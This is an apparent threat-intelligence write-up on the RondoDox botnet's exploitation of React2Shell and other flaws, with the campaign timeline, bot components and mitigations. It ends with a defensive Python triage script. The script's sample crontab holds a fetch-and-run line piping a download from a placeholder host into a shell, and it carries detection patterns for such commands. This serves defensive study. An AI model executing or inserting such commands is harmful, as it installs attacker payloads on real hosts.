RondoDox Botnet Exploits React2Shell CVSS 10.0 to Hijack 90,300+ IoT Devices and Web Servers

What happens when a critical remote code execution vulnerability in a widely-used web framework gets exploited by a sophisticated botnet operator to hijack thousands of IoT devices and web servers? RondoDox gives you the answer. This nine-month campaign, targeting Internet of Things devices and web applications worldwide, has escalated dramatically since the disclosure of React2Shell (CVE-2025-55182)—a CVSS 10.0 flaw in React Server Components and Next.js. As of December 2025, over 90,300 instances remain vulnerable globally, with 68,400 in the United States alone. RondoDox doesn’t just compromise a single device; it systematically enrolls victims into a botnet infrastructure designed to resist displacement, competing malware cleanup, and forensic recovery. The campaign demonstrates how a determined threat actor leveraging multiple zero-days and recently-disclosed critical flaws can scale attacks across heterogeneous infrastructure—from internet-facing React applications to obscure IoT routers to cloud-native deployments.

React2Shell Vulnerability (CVE-2025-55182): React2Shell is a critical remote code execution flaw affecting React Server Components (RSC) and Next.js frameworks. The vulnerability allows unauthenticated attackers to achieve arbitrary code execution on susceptible web servers. With a CVSS score of 10.0 and no authentication required, the attack surface is massive. Vulnerable instances span multiple versions and deployment configurations, and many organizations have not yet applied patches.

RondoDox Campaign Timeline & Evolution: The RondoDox botnet emerged in early 2025 but has undergone continuous expansion and tactical evolution. The campaign has four documented phases:

  • Phase 1 (March–April 2025): Initial reconnaissance and manual vulnerability scanning of target infrastructure. Threat actors conducted environment discovery to identify high-value targets.
  • Phase 2 (April–June 2025): Daily mass vulnerability probing of web applications (WordPress, Drupal, Apache Struts2) and IoT devices (Wavlink routers, generic Linux-based network appliances). Attackers automated enumeration to build a comprehensive list of exploitable targets.
  • Phase 3 (July–Early December 2025): Hourly automated large-scale deployment of bot payloads. The infrastructure was fully operational, with minimal human intervention required. Attackers achieved near-continuous scanning and infection.
  • Phase 4 (December 2025–Present): Integration of React2Shell as a primary initial access vector. Upon discovery of CVE-2025-55182, RondoDox operators rapidly weaponized the flaw, shifting focus to Next.js servers as high-priority targets. This phase demonstrates adaptive threat actor behavior—exploiting the newest critical vulnerabilities within days of disclosure.

Exploited Vulnerabilities Beyond React2Shell: RondoDox is not a one-trick operator. The campaign has leveraged multiple vulnerabilities across 2025:

  • CVE-2023-1389: A legacy vulnerability that RondoDox continues to exploit, indicating widespread unpatched infrastructure.
  • CVE-2025-24893: An XWiki vulnerability exploited in mass campaigns targeting knowledge management systems.
  • WordPress, Drupal, Struts2 flaws: Common web application vulnerabilities that remain prevalent in production environments.

This multi-vulnerability approach increases the likelihood of successful infection across diverse target environments. If one vulnerability is patched, attackers pivot to others.

RondoDox’s operational success stems from three critical factors: scale, sophistication, and persistence. A single compromised Next.js server or IoT device may seem insignificant. But RondoDox doesn’t operate on individual targets—it operates on networks. Tens of thousands of infected devices become a distributed computation resource for cryptocurrency mining, botnet relay infrastructure, and reconnaissance platforms for downstream attacks.

The botnet’s most dangerous feature is its anti-forensics capability. The “/nuts/bolts” component systematically terminates competing malware, removes rival cryptocurrency miners, clears artifacts from prior campaigns, and eliminates associated cron jobs before installing RondoDox persistence. This “cleanup” behavior serves two purposes: (1) it prevents resource contention (rival botnets consuming CPU/memory), and (2) it obscures the attack history, complicating incident response and attribution.

For organizations operating IoT infrastructure, the risk is severe. Unpatched Wavlink routers and similar devices often run minimal logging. A compromise may persist for months before detection. For web application operators running WordPress, Drupal, or—increasingly—Next.js, a single vulnerability can expose the entire web tier. React2Shell’s CVSS 10.0 rating reflects the severity: no authentication, no user interaction, complete system compromise possible.

The geographic concentration of vulnerable instances amplifies risk. With 68,400 of 90,300 vulnerable instances in the United States, American infrastructure is disproportionately exposed. This includes government agencies, educational institutions, healthcare systems, and private enterprises running internet-facing Next.js applications without patches.

The campaign’s persistence mechanism ensures long-term access even after initial detection. Once installed, RondoDox uses “/etc/crontab” and process whitelisting to survive reboot cycles and resist manual removal. The bot continuously scans /proc (process information) every ~45 seconds, killing non-whitelisted processes. This means even if a system administrator attempts to terminate the botnet process, it reinstalls itself automatically.

Economic impact is substantial but often invisible. Compromised devices burn electricity and bandwidth mining cryptocurrency or relaying traffic. Cloud environments experience unexpected egress charges. Victim organizations may not realize their infrastructure is compromised until they audit resource consumption or incident responders discover infection during unrelated investigations.

Attack Mechanics – Step by Step:

1. Reconnaissance & Target Identification: RondoDox operators scan the internet using Shodan, Censys, or custom scanning infrastructure to identify Next.js servers, WordPress installations, Drupal sites, Apache Struts2 endpoints, and Wavlink routers. They fingerprint services by observing HTTP headers, response patterns, and deployment artifacts. The automated scanning continuously updates a database of exploitable targets.

2. Vulnerability Exploitation: For React2Shell, the attack begins by sending a specially crafted HTTP request to a vulnerable Next.js server. The request exploits the RSC deserialization flaw, achieving unauthenticated remote code execution. The attacker’s payload is embedded in the HTTP body or parameters. No authentication is required; no user interaction is necessary.

3. Payload Staging: The initial RCE payload is minimal—a shell script or Python one-liner that downloads the bot binary from an attacker-controlled C2 server. This reduces detection surface: instead of delivering a 1 MB binary in the initial exploit, attackers fetch it after code execution is confirmed.

4. Botnet Loader Execution: The “/nuts/bolts” component is fetched and executed. This loader performs critical housekeeping:

  • Terminates competing malware (other botnets, cryptominers, worms)
  • Removes artifacts from prior campaigns (cron jobs, persistence scripts)
  • Clears Docker containers and orphaned processes
  • Establishes persistence via /etc/crontab and systemd services
  • Begins continuous process monitoring, killing non-whitelisted processes every ~45 seconds

5. Main Bot Installation & C2 Communication: After cleanup, the main RondoDox bot binary (“/nuts/x86” for x86 architecture, with ARM variants available) is downloaded and executed. The bot establishes encrypted communication with the command-and-control server, reporting system information (CPU, RAM, network connectivity, detected security software).

6. Payload Deployment: Based on C2 instructions, the infected device runs:

  • Cryptocurrency Miners: The “/nuts/poop” component begins mining cryptocurrency (typically Monero), consuming CPU resources. Victims experience performance degradation, increased power bills, and potential overheating.
  • Botnet Relay: The device becomes part of a distributed botnet mesh, relaying traffic and participating in DDoS campaigns, spam distribution, or unauthorized scanning.
  • Reconnaissance Payload: The bot can receive commands to launch further reconnaissance against the victim’s internal network, lateral movement scanning, or targeted exploitation.

Detection & Mitigation (Immediate):

  • Patch React2Shell: Update Next.js to a patched version immediately. Check all Next.js deployments, especially production instances.
  • Patch Legacy Vulnerabilities: Apply patches for CVE-2023-1389, CVE-2025-24893, and WordPress/Drupal plugins. Prioritize internet-facing applications.
  • IoT Device Inventory & Patching: Enumerate all Wavlink routers and similar IoT devices. Update firmware to patched versions. For devices with no patch available, isolate them to dedicated VLANs.
  • Network Segmentation: Place IoT devices on isolated network segments (VLANs) with restricted egress. Use firewall rules to permit only necessary traffic (e.g., NTP for time sync, DNS for name resolution).
  • Web Application Firewalls (WAF): Deploy WAF rules to detect React2Shell exploitation attempts. Block suspicious POST/PUT requests to Next.js endpoints with abnormal payloads.
  • Process Monitoring & Behavioral Detection: Monitor for suspicious process execution patterns (e.g., shell processes spawning from web server processes, cron job modifications, /etc/crontab changes). Alert on execution of unknown binaries in /tmp or /var/tmp.
  • C2 Sinkholing & Blocking: Block known RondoDox C2 IPs and domains at the firewall level. Subscribe to threat intelligence feeds for updated IOCs.
  • Forensic Artifact Hunting: On suspected compromised systems, look for:
    • /etc/crontab entries with unusual timing or commands
    • /proc/sys/net/ipv4/ip_forward modifications (indicating relay behavior)
    • Unusual network listener ports (botnet C2 communication)
    • Modified systemd service files
    • Unusual /tmp or /var/tmp binary files
    • High CPU consumption by unfamiliar processes
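The process-monitoring and artifact-hunting points above can be turned into a repeatable host triage. The script below is an added example, not code from the original write-up or from any vendor report; it parses snapshots of the artifacts listed (crontab text, a `ps -eo pid,ppid,comm,%cpu` listing, `/proc/net/tcp` lines, a listing of `/tmp` and `/var/tmp`, and the `ip_forward` sysctl value) and returns findings. The sample snapshots are constructed for the demonstration, and the sets of expected listening ports, familiar process names and web-server parents are assumptions you would tune per host. The `c2.invalid` hostname and the file names under `/tmp/.x/` are placeholders, not indicators from the page.

```python
#!/usr/bin/env python3
"""Host triage for RondoDox-style artifacts (added example, not the report's own tooling)."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "artifact detail")

# Assumptions for this demo host: tune these per environment.
WEB_PARENTS = {"node", "next-server", "nginx", "apache2", "httpd", "php-fpm"}
SHELLS = {"sh", "bash", "dash", "ash", "busybox"}
EXPECTED_LISTEN_PORTS = {22, 53, 80, 123, 443, 3000}
KNOWN_PROCS = {"systemd", "sshd", "nginx", "node", "cron", "kworker/0:1"}
CPU_THRESHOLD = 80.0

# Crontab entries that fetch-and-execute or run binaries from world-writable dirs.
SUSPICIOUS_CRON = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|\bcurl\s|\bwget\s|\|\s*(sh|bash)\b)")


def check_crontab(text):
    """Return crontab lines matching the fetch-and-execute / /tmp patterns."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and SUSPICIOUS_CRON.search(line):
            out.append(Finding("crontab", line))
    return out


def check_processes(ps_text):
    """Flag shells whose parent is a web server, and unfamiliar CPU hogs."""
    rows = []
    for line in ps_text.strip().splitlines()[1:]:  # skip the header row
        pid, ppid, comm, cpu = line.split(None, 3)
        rows.append((int(pid), int(ppid), comm, float(cpu)))
    by_pid = {pid: comm for pid, _, comm, _ in rows}
    out = []
    for pid, ppid, comm, cpu in rows:
        parent = by_pid.get(ppid, "?")
        if comm in SHELLS and parent in WEB_PARENTS:
            out.append(Finding("process", f"{parent}({ppid}) spawned {comm}({pid})"))
        if cpu >= CPU_THRESHOLD and comm not in KNOWN_PROCS:
            out.append(Finding("cpu", f"{comm}({pid}) at {cpu}% CPU"))
    return out


def check_listeners(proc_net_tcp):
    """Parse /proc/net/tcp: state 0A is LISTEN, local port is the hex after ':'."""
    out = []
    for line in proc_net_tcp.strip().splitlines()[1:]:
        fields = line.split()
        local, state = fields[1], fields[3]
        port = int(local.split(":")[1], 16)
        if state == "0A" and port not in EXPECTED_LISTEN_PORTS:
            out.append(Finding("listener", f"unexpected listening port {port}"))
    return out


def check_tmp(listing):
    """Flag regular files with an execute bit from an (ls-style mode, path) listing."""
    return [Finding("tmp-binary", path) for mode, path in listing
            if mode[0] == "-" and "x" in mode]


def check_ip_forward(value):
    """ip_forward=1 on a host that is not a router can indicate relay behaviour."""
    return [Finding("ip_forward", "enabled")] if value.strip() == "1" else []


def triage(crontab, ps, tcp, tmp, ip_forward):
    """Run every check and return the combined list of findings."""
    return (check_crontab(crontab) + check_processes(ps) + check_listeners(tcp)
            + check_tmp(tmp) + check_ip_forward(ip_forward))


# Constructed sample snapshots (not real host data). c2.invalid is a placeholder.
CRONTAB = """# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /tmp/.x/bolts >/dev/null 2>&1
*/5 * * * * root curl -s http://c2.invalid/nuts/x86 | sh
"""
PS = """  PID  PPID COMMAND         %CPU
    1     0 systemd          0.0
  412     1 sshd             0.0
  415     1 cron             0.0
  880     1 node             1.2
  901   880 sh               0.0
  930   901 poop            97.5
"""
TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0BB8 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0 100 0 0 10 0
   1: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0 100 0 0 10 0
   2: 0100007F:B8D2 0100007F:0BB8 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0 20 4 30 10 -1
"""
TMP = [("drwxrwxrwt", "/tmp"), ("-rwxr-xr-x", "/tmp/.x/bolts"),
       ("-rw-r--r--", "/tmp/npm-cache.log"), ("-rwxr-xr-x", "/var/tmp/x86")]
IP_FORWARD = "1\n"

if __name__ == "__main__":
    for f in triage(CRONTAB, PS, TCP, TMP, IP_FORWARD):
        print(f"[{f.artifact}] {f.detail}")
```

On a live host, feed `triage()` the contents of `/etc/crontab`, the output of `ps -eo pid,ppid,comm,%cpu`, `/proc/net/tcp` (and `/proc/net/tcp6`), a walk of `/tmp` and `/var/tmp`, and `/proc/sys/net/ipv4/ip_forward`. Because the bot re-establishes itself from cron and kills non-whitelisted processes, run the triage from a read-only boot medium or a forensic image rather than from the suspect host's own shell, and treat any crontab finding as the root of the persistence chain.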

RondoDox represents a convergence of historical botnet patterns with modern attack infrastructure. Botnets have existed since the early 2000s—Mirai, Botnet.B, Conficker—but RondoDox incorporates lessons from all prior generations. The botnet’s multi-vulnerability approach mirrors the operational strategy of sophisticated threat groups like Lazarus and APT1: maximize target coverage by exploiting every available vulnerability.

The adoption of React2Shell within hours of its public disclosure (December 2025) demonstrates threat actor monitoring of disclosure channels. Attackers subscribe to CISA advisories, threat intelligence feeds, and security news outlets. When a critical vulnerability is announced, weaponization follows within days. This rapid exploitation window has become a standard threat actor tactic.

RondoDox’s anti-forensics capabilities—the cleanup behavior of “/nuts/bolts”—indicate an operator focused on persistence over aggression. Unlike worms that propagate indiscriminately and crash systems, RondoDox seeks to remain undetected for months or years. The continuous process monitoring and non-whitelisted process termination suggest an attacker who has observed detection in prior campaigns and adapted.

The geographic exposure skew (68,400 of 90,300 vulnerable instances in the U.S.) may reflect attacker targeting preferences or simply the distribution of Next.js deployments. Either way, American infrastructure bears disproportionate risk. Government contractors, DoD suppliers, and critical infrastructure operators running unpatched Next.js applications are high-priority targets for espionage, sabotage, or supply chain compromise.

Cryptocurrency mining as a primary payload choice reflects economic rationality. Botnets that mine Monero (a privacy-focused cryptocurrency) are converting computational power directly into financial gain. Unlike ransomware (which requires negotiation and risks law enforcement attention) or wiper malware (which has limited monetization), mining is silent, scalable, and generates continuous revenue with minimal operational overhead.

The timing and scale of the campaign—hourly deployment at large scale—indicate operational maturity and resource investment. This is not a small group running scripts from home laptops. This is infrastructure—scanning servers, C2 nodes, payload hosting, cryptocurrency wallet infrastructure, operational security practices. The threat actor has invested significant resources and intends long-term operation.

Primary Technical Analysis & Reporting:

Vulnerable Infrastructure Statistics (December 31, 2025 – Shadowserver Data):

  • Global: 90,300+ vulnerable instances
  • United States: 68,400
  • Germany: 4,300
  • France: 2,800
  • India: 1,500
  • Other: ~13,400 (distributed across remaining countries)

Affected Technologies:

  • React Server Components (RSC)
  • Next.js (all vulnerable versions pre-patch)
  • WordPress (with vulnerable plugins)
  • Drupal (with vulnerable modules)
  • Apache Struts2
  • Wavlink routers and similar IoT appliances

RondoDox Bot Components:

  • /nuts/poop: Cryptocurrency miner (Monero)
  • /nuts/bolts: Botnet loader, persistence installer, process monitor, rival malware terminator
  • /nuts/x86: Main bot binary for x86 architecture (with ARM variants available)
  • C2 Communication: Encrypted, utilizing multiple fallback channels

Attack Lifecycle Timeline:

  • March 2025: Initial reconnaissance begins
  • April–June 2025: Mass vulnerability scanning and enumeration
  • July–December 2025: Automated large-scale deployment
  • December 2025: React2Shell integrated as primary initial access vector
  • January 2026: Campaign continues with hourly deployment across 90,300+ instances

Detection & Indicator of Compromise (IOC) Resources: Organizations should query Shadowserver’s live dashboard to determine exposure, subscribe to CISA KEV catalog updates for newly weaponized vulnerabilities, and monitor threat intelligence feeds (Darktrace, CloudSEK, Kaspersky) for updated RondoDox C2 infrastructure and payload hashes. The botnet’s rapid iteration and multi-vulnerability approach demand continuous monitoring.